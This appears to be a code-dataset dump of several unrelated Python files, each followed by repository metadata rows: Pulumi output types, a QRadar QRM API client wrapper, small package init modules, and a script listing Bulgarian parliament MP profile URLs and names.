            pulumi.set(__self__, key, value)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """Return the stored ``id`` value, if any."""
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def password(self) -> Optional[str]:
        """Return the stored ``password`` value, if any."""
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def scope(self) -> Optional[str]:
        """Return the stored ``scope`` value, if any."""
        return pulumi.get(self, "scope")

    @property
    @pulumi.getter
    def username(self) -> Optional[str]:
        """Return the stored ``username`` value, if any."""
        return pulumi.get(self, "username")
@pulumi.output_type
class UserSchemaArrayOneOf(dict):
    """Output type pairing an enum member with its display name."""

    def __init__(__self__, *,
                 const: str,
                 title: str):
        """
        :param str const: value mapping to member of `enum`.
        :param str title: display name for the enum value.
        """
        # Both fields are required, so they are stored unconditionally.
        for key, value in (("const", const), ("title", title)):
            pulumi.set(__self__, key, value)

    @property
    @pulumi.getter
    def const(self) -> str:
        """
        value mapping to member of `enum`.
        """
        return pulumi.get(self, "const")

    @property
    @pulumi.getter
    def title(self) -> str:
        """
        display name for the enum value.
        """
        return pulumi.get(self, "title")
@pulumi.output_type
class UserSchemaOneOf(dict):
    """Output type pairing an enum member with its display name."""

    def __init__(__self__, *,
                 const: str,
                 title: str):
        """
        :param str const: value mapping to member of `enum`.
        :param str title: display name for the enum value.
        """
        # Required fields: always persisted, `const` first then `title`.
        pulumi.set(__self__, "const", const)
        pulumi.set(__self__, "title", title)

    @property
    @pulumi.getter
    def const(self) -> str:
        """
        value mapping to member of `enum`.
        """
        return pulumi.get(self, "const")

    @property
    @pulumi.getter
    def title(self) -> str:
        """
        display name for the enum value.
        """
        return pulumi.get(self, "title")
@pulumi.output_type
class GetSamlAttributeStatementResult(dict):
    """Result type for a SAML attribute statement returned by a data source."""

    def __init__(__self__, *,
                 filter_type: str,
                 filter_value: str,
                 name: str,
                 namespace: str,
                 type: str,
                 values: Sequence[str]):
        """
        :param str filter_type: Type of group attribute filter.
        :param str filter_value: Filter value to use.
        :param str name: The name of the attribute statement.
        :param str namespace: The attribute namespace.
        :param str type: The type of attribute statement value.
        :param Sequence[str] values: Array of values to use.
        """
        # All fields are required; store them in declaration order.
        fields = (("filter_type", filter_type),
                  ("filter_value", filter_value),
                  ("name", name),
                  ("namespace", namespace),
                  ("type", type),
                  ("values", values))
        for key, value in fields:
            pulumi.set(__self__, key, value)

    @property
    @pulumi.getter(name="filterType")
    def filter_type(self) -> str:
        """
        Type of group attribute filter.
        """
        return pulumi.get(self, "filter_type")

    @property
    @pulumi.getter(name="filterValue")
    def filter_value(self) -> str:
        """
        Filter value to use.
        """
        return pulumi.get(self, "filter_value")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        The name of the attribute statement.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def namespace(self) -> str:
        """
        The attribute namespace.
        """
        return pulumi.get(self, "namespace")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        The type of attribute statement value.
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """
        Array of values to use.
        """
        return pulumi.get(self, "values")
| 29.417647
| 243
| 0.569786
| 2,247
| 20,004
| 4.88162
| 0.067646
| 0.07822
| 0.066369
| 0.097001
| 0.871091
| 0.864618
| 0.839639
| 0.798158
| 0.783572
| 0.764427
| 0
| 0.000939
| 0.307788
| 20,004
| 679
| 244
| 29.460972
| 0.791218
| 0.159568
| 0
| 0.82227
| 1
| 0.004283
| 0.075213
| 0.006215
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162741
| false
| 0.089936
| 0.010707
| 0.068522
| 0.331906
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
10673615ce6594f8d14a0cb5b3835ab1fc69cf84
| 253
|
py
|
Python
|
h1st_contrib/pred_maint/data_mgmt/__init__.py
|
h1st-ai/h1st-contrib
|
38fbb1fff4513bb3433bc12f2b436836e5e51c80
|
[
"Apache-2.0"
] | 1
|
2022-02-19T18:55:43.000Z
|
2022-02-19T18:55:43.000Z
|
h1st_contrib/pred_maint/data_mgmt/__init__.py
|
h1st-ai/h1st-contrib
|
38fbb1fff4513bb3433bc12f2b436836e5e51c80
|
[
"Apache-2.0"
] | null | null | null |
h1st_contrib/pred_maint/data_mgmt/__init__.py
|
h1st-ai/h1st-contrib
|
38fbb1fff4513bb3433bc12f2b436836e5e51c80
|
[
"Apache-2.0"
] | null | null | null |
"""Data Sets."""
from .equipment_parquet_data import (
EquipmentParquetDataSet,
EQUIPMENT_INSTANCE_ID_COL, DATE_COL, DATE_TIME_COL,
)
__all__ = (
'EquipmentParquetDataSet',
'EQUIPMENT_INSTANCE_ID_COL', 'DATE_COL', 'DATE_TIME_COL',
)
| 18.071429
| 61
| 0.731225
| 28
| 253
| 5.964286
| 0.464286
| 0.167665
| 0.479042
| 0.502994
| 0.754491
| 0.754491
| 0.754491
| 0.754491
| 0.754491
| 0.754491
| 0
| 0
| 0.15415
| 253
| 13
| 62
| 19.461538
| 0.780374
| 0.039526
| 0
| 0
| 0
| 0
| 0.291139
| 0.202532
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1067800ceab5a35e19bc23e16dd1ee1efb138b70
| 178
|
py
|
Python
|
client/starwhale/__init__.py
|
star-whale/starwhale
|
11cfe86d3a0c2972b508812d101f1b32e4166706
|
[
"Apache-2.0"
] | 13
|
2022-03-09T15:27:29.000Z
|
2022-03-29T06:12:47.000Z
|
client/starwhale/__init__.py
|
star-whale/starwhale
|
11cfe86d3a0c2972b508812d101f1b32e4166706
|
[
"Apache-2.0"
] | 7
|
2022-03-14T08:59:39.000Z
|
2022-03-30T00:50:40.000Z
|
client/starwhale/__init__.py
|
star-whale/starwhale
|
11cfe86d3a0c2972b508812d101f1b32e4166706
|
[
"Apache-2.0"
] | 9
|
2022-03-10T08:12:44.000Z
|
2022-03-26T15:00:13.000Z
|
import os

import importlib_metadata

# Resolve the installed package version from distribution metadata instead of
# hard-coding it in the source tree.
__version__: str = importlib_metadata.version("starwhale")  # type: ignore

# Publish the version via the environment, presumably for subprocesses or
# other components that read it from there — confirm against consumers.
os.environ["SW_VERSION"] = __version__

# TODO: only export api
| 17.8
| 74
| 0.769663
| 22
| 178
| 5.727273
| 0.681818
| 0.269841
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134831
| 178
| 9
| 75
| 19.777778
| 0.818182
| 0.191011
| 0
| 0
| 0
| 0
| 0.134752
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
107a270170c8f4b207de679ad4a99a08f773f094
| 8,648
|
py
|
Python
|
qradar4py/endpoints/qrm.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 10
|
2019-11-19T21:13:32.000Z
|
2021-11-17T19:35:53.000Z
|
qradar4py/endpoints/qrm.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 2
|
2021-05-21T16:15:16.000Z
|
2021-07-20T12:34:49.000Z
|
qradar4py/endpoints/qrm.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 6
|
2020-09-14T13:44:55.000Z
|
2021-11-17T19:35:55.000Z
|
from urllib.parse import urljoin
from qradar4py.endpoints.api_endpoint import QRadarAPIEndpoint
from qradar4py.endpoints.api_endpoint import request_vars
from qradar4py.endpoints.api_endpoint import header_vars
class Qrm(QRadarAPIEndpoint):
    """
    The QRadar API endpoint group /qrm and its endpoints.

    Each public method wraps exactly one REST call under the ``qrm/`` base
    path and returns whatever ``self._call`` produces.
    NOTE(review): the ``Range``, ``filter`` and ``fields`` parameters are
    never referenced in the method bodies; they appear to be consumed by the
    ``header_vars`` / ``request_vars`` decorators and attached to the
    outgoing request — confirm against api_endpoint.py.
    """
    # Path fragment joined onto the API root for every call in this group.
    __baseurl = 'qrm/'

    def __init__(self, url, header, verify):
        # url: API root URL; header: auth/HTTP headers reused on each call;
        # verify: TLS verification setting, all forwarded to the base class.
        super().__init__(urljoin(url, self.__baseurl),
                         header,
                         verify)

    @header_vars('Range')
    @request_vars('filter', 'fields')
    def get_model_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
        """
        GET /qrm/model_groups
        Retrieves a list of model groups.
        """
        function_endpoint = urljoin(self._baseurl, 'model_groups')
        return self._call('GET', function_endpoint, **kwargs)

    def delete_model_groups_by_group_id(self, group_id, **kwargs):
        """
        DELETE /qrm/model_groups/{group_id}
        Deletes a model group.
        """
        function_endpoint = urljoin(self._baseurl, 'model_groups/{group_id}'.format(group_id=group_id))
        # DELETE endpoints answer with plain text rather than JSON.
        return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)

    @header_vars('fields')
    def post_model_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
        """
        POST /qrm/model_groups/{group_id}
        Updates the owner of a model group.
        """
        function_endpoint = urljoin(self._baseurl, 'model_groups/{group_id}'.format(group_id=group_id))
        # `group` is sent as the JSON request body.
        return self._call('POST', function_endpoint, json=group, **kwargs)

    @request_vars('fields')
    def get_model_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
        """
        GET /qrm/model_groups/{group_id}
        Retrieves a model group.
        """
        function_endpoint = urljoin(self._baseurl, 'model_groups/{group_id}'.format(group_id=group_id))
        return self._call('GET', function_endpoint, **kwargs)

    @header_vars('Range')
    @request_vars('filter', 'fields')
    def get_qrm_saved_search_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
        """
        GET /qrm/qrm_saved_search_groups
        Retrieves a list of QRM saved search groups.
        """
        function_endpoint = urljoin(self._baseurl, 'qrm_saved_search_groups')
        return self._call('GET', function_endpoint, **kwargs)

    def delete_qrm_saved_search_groups_by_group_id(self, group_id, **kwargs):
        """
        DELETE /qrm/qrm_saved_search_groups/{group_id}
        Deletes a QRM saved search group.
        """
        function_endpoint = urljoin(self._baseurl, 'qrm_saved_search_groups/{group_id}'.format(group_id=group_id))
        return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)

    @request_vars('fields')
    def get_qrm_saved_search_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
        """
        GET /qrm/qrm_saved_search_groups/{group_id}
        Retrieves a QRM saved search group.
        """
        function_endpoint = urljoin(self._baseurl, 'qrm_saved_search_groups/{group_id}'.format(group_id=group_id))
        return self._call('GET', function_endpoint, **kwargs)

    @header_vars('fields')
    def post_qrm_saved_search_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
        """
        POST /qrm/qrm_saved_search_groups/{group_id}
        Updates the owner of a QRM saved search group.
        """
        function_endpoint = urljoin(self._baseurl, 'qrm_saved_search_groups/{group_id}'.format(group_id=group_id))
        return self._call('POST', function_endpoint, json=group, **kwargs)

    @header_vars('Range')
    @request_vars('filter', 'fields')
    def get_question_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
        """
        GET /qrm/question_groups
        Retrieves a list of question groups.
        """
        function_endpoint = urljoin(self._baseurl, 'question_groups')
        return self._call('GET', function_endpoint, **kwargs)

    @header_vars('fields')
    def post_question_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
        """
        POST /qrm/question_groups/{group_id}
        Updates the owner of a question group.
        """
        function_endpoint = urljoin(self._baseurl, 'question_groups/{group_id}'.format(group_id=group_id))
        return self._call('POST', function_endpoint, json=group, **kwargs)

    def delete_question_groups_by_group_id(self, group_id, **kwargs):
        """
        DELETE /qrm/question_groups/{group_id}
        Deletes a question group.
        """
        function_endpoint = urljoin(self._baseurl, 'question_groups/{group_id}'.format(group_id=group_id))
        return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)

    @request_vars('fields')
    def get_question_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
        """
        GET /qrm/question_groups/{group_id}
        Retrieves a question group.
        """
        function_endpoint = urljoin(self._baseurl, 'question_groups/{group_id}'.format(group_id=group_id))
        return self._call('GET', function_endpoint, **kwargs)

    @header_vars('Range')
    @request_vars('filter', 'fields')
    def get_simulation_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
        """
        GET /qrm/simulation_groups
        Retrieves a of list the simulation groups.
        """
        function_endpoint = urljoin(self._baseurl, 'simulation_groups')
        return self._call('GET', function_endpoint, **kwargs)

    @header_vars('fields')
    def post_simulation_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
        """
        POST /qrm/simulation_groups/{group_id}
        Updates the owner of a simulation group.
        """
        function_endpoint = urljoin(self._baseurl, 'simulation_groups/{group_id}'.format(group_id=group_id))
        return self._call('POST', function_endpoint, json=group, **kwargs)

    def delete_simulation_groups_by_group_id(self, group_id, **kwargs):
        """
        DELETE /qrm/simulation_groups/{group_id}
        Deletes a simulation group.
        """
        function_endpoint = urljoin(self._baseurl, 'simulation_groups/{group_id}'.format(group_id=group_id))
        return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)

    @request_vars('fields')
    def get_simulation_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
        """
        GET /qrm/simulation_groups/{group_id}
        Retrieves a simulation group.
        """
        function_endpoint = urljoin(self._baseurl, 'simulation_groups/{group_id}'.format(group_id=group_id))
        return self._call('GET', function_endpoint, **kwargs)

    @header_vars('Range')
    @request_vars('filter', 'fields')
    def get_topology_saved_search_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
        """
        GET /qrm/topology_saved_search_groups
        Retrieves a list of topology saved search groups.
        """
        function_endpoint = urljoin(self._baseurl, 'topology_saved_search_groups')
        return self._call('GET', function_endpoint, **kwargs)

    def delete_topology_saved_search_groups_by_group_id(self, group_id, **kwargs):
        """
        DELETE /qrm/topology_saved_search_groups/{group_id}
        Deletes a topology saved search group.
        """
        function_endpoint = urljoin(self._baseurl, 'topology_saved_search_groups/{group_id}'.format(group_id=group_id))
        return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)

    @header_vars('fields')
    def post_topology_saved_search_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
        """
        POST /qrm/topology_saved_search_groups/{group_id}
        Updates the owner of an topology saved search group.
        """
        function_endpoint = urljoin(self._baseurl, 'topology_saved_search_groups/{group_id}'.format(group_id=group_id))
        return self._call('POST', function_endpoint, json=group, **kwargs)

    @request_vars('fields')
    def get_topology_saved_search_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
        """
        GET /qrm/topology_saved_search_groups/{group_id}
        Retrieves a topology saved search group.
        """
        function_endpoint = urljoin(self._baseurl, 'topology_saved_search_groups/{group_id}'.format(group_id=group_id))
        return self._call('GET', function_endpoint, **kwargs)
| 43.676768
| 119
| 0.671716
| 1,066
| 8,648
| 5.102251
| 0.057223
| 0.11583
| 0.071704
| 0.099283
| 0.95091
| 0.912484
| 0.887663
| 0.820371
| 0.784887
| 0.730649
| 0
| 0.000437
| 0.205828
| 8,648
| 197
| 120
| 43.898477
| 0.791497
| 0.179579
| 0
| 0.611111
| 0
| 0
| 0.127574
| 0.077566
| 0
| 0
| 0
| 0
| 0
| 1
| 0.233333
| false
| 0
| 0.044444
| 0
| 0.522222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
52b13b4ae53b9777679bf154e2238fc968ec3714
| 174,757
|
py
|
Python
|
my.py
|
Krastanov/parlamentaren-kontrol
|
f79f2408001ae119a43477d4ceeeb14780f5ce70
|
[
"BSD-3-Clause"
] | 1
|
2020-03-26T19:01:06.000Z
|
2020-03-26T19:01:06.000Z
|
my.py
|
Krastanov/parlamentaren-kontrol
|
f79f2408001ae119a43477d4ceeeb14780f5ce70
|
[
"BSD-3-Clause"
] | null | null | null |
my.py
|
Krastanov/parlamentaren-kontrol
|
f79f2408001ae119a43477d4ceeeb14780f5ce70
|
[
"BSD-3-Clause"
] | null | null | null |
from pk_tools import canonical_party_name
# MP (member of parliament) profile ids scraped from parliament.bg.
# The original code hard-coded ~550 full profile URLs
# (http://www.parliament.bg/bg/MP/<id>) and immediately reduced each one to
# its trailing integer id, discarding the strings.  Generating the ids
# directly from their inclusive ranges is equivalent and far easier to
# maintain.  The gaps between ranges (e.g. 1090-1107, 1121, 1646, 1731)
# were absent from the original URL list as well.
_MP_ID_RANGES = [
    (835, 1089), (1108, 1108), (1112, 1120), (1122, 1124), (1127, 1138),
    (1440, 1645), (1647, 1650), (1653, 1709), (1727, 1730), (1732, 1734),
]
url = [mp_id for lo, hi in _MP_ID_RANGES for mp_id in range(lo, hi + 1)]
name = ['\xd0\x90\xd0\x9b\xd0\x98\xd0\x9e\xd0\xa1\xd0\x9c\xd0\x90\xd0\x9d \xd0\x98\xd0\x91\xd0\xa0\xd0\x90\xd0\x98\xd0\x9c \xd0\x98\xd0\x9c\xd0\x90\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9a\xd0\x95\xd0\x92 \xd0\x9a\xd0\x90\xd0\x9c\xd0\x91\xd0\x98\xd0\xa2\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x94\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x98\xd0\x9a\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x9e\xd0\xa0\xd0\x9d\xd0\x95\xd0\x9b\xd0\x98\xd0\xaf \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9d\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x95\xd0\x9d \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\xa2\xd0\x90\xd0\xa0\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x9c\xd0\x98\xd0\xa2\xd0\x9a\xd0\x9e \xd0\x96\xd0\x98\xd0\x92\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x97\xd0\x90\xd0\xa5\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\xa3\xd0\xa1\xd0\x90 \xd0\x94\xd0\x96\xd0\x95\xd0\x9c\xd0\x90\xd0\x9b \xd0\x9f\xd0\x90\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x9e\xd0\x93\xd0\x9d\xd0\xaf\xd0\x9d \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x95\xd0\xa2\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\xaf\xd0\x9d\xd0\x95 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\xaf\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x94\xd0\x90\xd0\xa0 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9e\xd0\x9b\xd0\x95\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa1\xd0\x98\xd0\x94\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x90 
\xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x98\xd0\x9b\xd0\x95\xd0\x92\xd0\x90-\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x94\xd0\x96\xd0\x95\xd0\x92\xd0\x94\xd0\x95\xd0\xa2 \xd0\x98\xd0\x91\xd0\xa0\xd0\xaf\xd0\x9c \xd0\xa7\xd0\x90\xd0\x9a\xd0\xaa\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x91\xd0\x9e\xd0\x99\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x94\xd0\xa3\xd0\xa0\xd0\xa5\xd0\x90\xd0\x9d \xd0\x9c\xd0\x95\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\x9c\xd0\xa3\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa4\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x92\xd0\xaa\xd0\x9b\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\x9d\xd0\x9a\xd0\x9e \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x9e\xd0\xa0\xd0\x95\xd0\xa8\xd0\x90\xd0\xa0\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d \xd0\xaf\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x93\xd0\xae\xd0\x97\xd0\x95\xd0\x9b\xd0\x95\xd0\x92', '\xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0 \xd0\x96\xd0\x90\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x99\xd0\x9e\xd0\xa1\xd0\x98\xd0\xa4\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x95\xd0\x99 \xd0\x9b\xd0\x90\xd0\x97\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x90\xd0\x9d\xd0\xa2\xd0\x95\xd0\x92', '\xd0\x94\xd0\x90\xd0\x9d\xd0\x98\xd0\x95\xd0\x9b\xd0\x90 \xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', 
'\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x90\xd0\xa0\xd0\x91\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa0\xd0\x90\xd0\x94\xd0\x95\xd0\x92', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d \xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa6\xd0\x9e\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x90\xd0\x92\xd0\x95\xd0\x9b \xd0\x98\xd0\x9b\xd0\x98\xd0\x95\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x92\xd0\x95\xd0\xa2\xd0\x9e\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x9d\xd0\x95\xd0\x94\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9d\xd0\x95\xd0\x94\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa1\xd0\x92\xd0\x98\xd0\x9b\xd0\x95\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9a\xd0\xa0\xd0\x90\xd0\x99\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa1\xd0\x95\xd0\xa0\xd0\x93\xd0\x95\xd0\x99 \xd0\x94\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x98\xd0\x95\xd0\x92\xd0\x98\xd0\xa7 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\xa8\xd0\x95\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90 \xd0\x90\xd0\x9b\xd0\x98\xd0\x9f\xd0\x98\xd0\x95\xd0\x92\xd0\x90 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x91\xd0\x9e\xd0\x99\xd0\x9a\xd0\x9e 
